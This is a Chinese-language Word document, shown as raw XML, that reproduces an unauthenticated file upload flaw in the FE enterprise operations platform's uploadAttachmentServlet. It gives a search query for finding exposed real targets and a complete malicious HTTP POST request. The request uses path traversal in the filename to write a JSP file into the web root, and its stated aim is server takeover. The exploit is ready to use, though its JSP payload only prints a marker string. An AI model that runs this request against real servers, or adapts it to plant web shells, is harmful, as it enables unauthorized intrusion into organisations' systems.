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DE5D" w14:textId="3325FF53" w:rsidR="006F4493" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>飞企互联-FE企业运营管理平台uploadAttachmentServlet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>任意文件上传漏洞复现</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1941A174" w14:textId="77777777" w:rsidR="006F4493" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="qZqB6"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>漏洞简介</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="05DBA8CD" w14:textId="77777777" w:rsidR="006F4493" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="u613b0f2b"/>
      <w:bookmarkEnd w:id="0"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>飞企互联-FE企业运营管理平台</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> /servlet/uploadAttachmentServlet接口处存在文件上传漏洞，未经身份验证的攻击者可以利用此漏洞上传恶意后门文件，获取服务器权限，进而控制整个web服务器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E762CA" w14:textId="77777777" w:rsidR="006F4493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H3XQj"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C5C092" w14:textId="77777777" w:rsidR="006F4493" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="u086e1318"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>步骤一、使用以下搜索语法获取测试资产并确定测试目标</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7944B5" w14:textId="77777777" w:rsidR="006F4493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NR0zA"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>app="FE-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>协作平台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  <w:t>app="FE-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>协作平台</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>" &amp;&amp; region="Shanxi"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4D98E9" w14:textId="77777777" w:rsidR="006F4493" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="u48151421"/>
      <w:bookmarkEnd w:id="4"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>步骤二、拼接以下路径如返回以下页面则存在漏洞</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="04F01597" w14:textId="77777777" w:rsidR="006F4493" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="uecb2f137"/>
      <w:bookmarkStart w:id="7" w:name="u9a1045ee"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F414DFE" wp14:editId="2759C106">
            <wp:extent cx="5841999" cy="876256"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="726443476" name="图片 72644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3334" cy="10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0978E766" w14:textId="77777777" w:rsidR="006F4493" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="u5874a458"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>步骤三、发送以下恶意数据包，实现文件上传漏洞攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E51E79A" w14:textId="77777777" w:rsidR="006F4493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9" w:name="thZg4"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>POST /servlet/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>uploadAttachmentServlet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HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>Host: 127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>AppleWebKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8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Accept-Language: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>zh-CN,zh;q</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Accept-Encoding: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>gzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>, deflate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Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk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------</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>WebKitFormBoundaryKNt0t4vBe8cX9rZk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>Content-Disposition: form-data; name="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>uploadFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>"; filename="../../../../../</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>jboss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/web/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>fe.war</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>hello.jsp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  <w:t>Content-Type: text/plain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&lt;% </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>out.println</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>helloFLNB</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>");%&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>------WebKitFormBoundaryKNt0t4vBe8cX9rZk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>Content-Disposition: form-data; name="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>json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{"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>iq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>":{"query":{"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>UpdateType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>":"mail"}}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>------WebKitFormBoundaryKNt0t4vBe8cX9rZk--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="03103155" w14:textId="2A64E88D" w:rsidR="006F4493" w:rsidRDefault="00000000" w:rsidP="00793F1D">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="uafadb604"/>
      <w:bookmarkStart w:id="11" w:name="u6ca19f34"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="394ED30E" wp14:editId="20038BB1">
            <wp:extent cx="5300134" cy="3671883"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="623584638" name="图片 62358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134" cy="36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u707ac797"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4312C357" wp14:editId="41DCC9BB">
            <wp:extent cx="3894667" cy="940881"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="166609663" name="图片 16660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667" cy="9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kua6R"/>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:sectPr w:rsidR="006F4493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F4493"/>
    <w:rsid w:val="006F4493"/>
    <w:rsid w:val="00793F1D"/>
    <w:rsid w:val="00E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931"/>
  <w15:docId w15:val="{269DC612-B47C-4AB5-A348-B320E146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2024-07-01T12:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-01T12:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>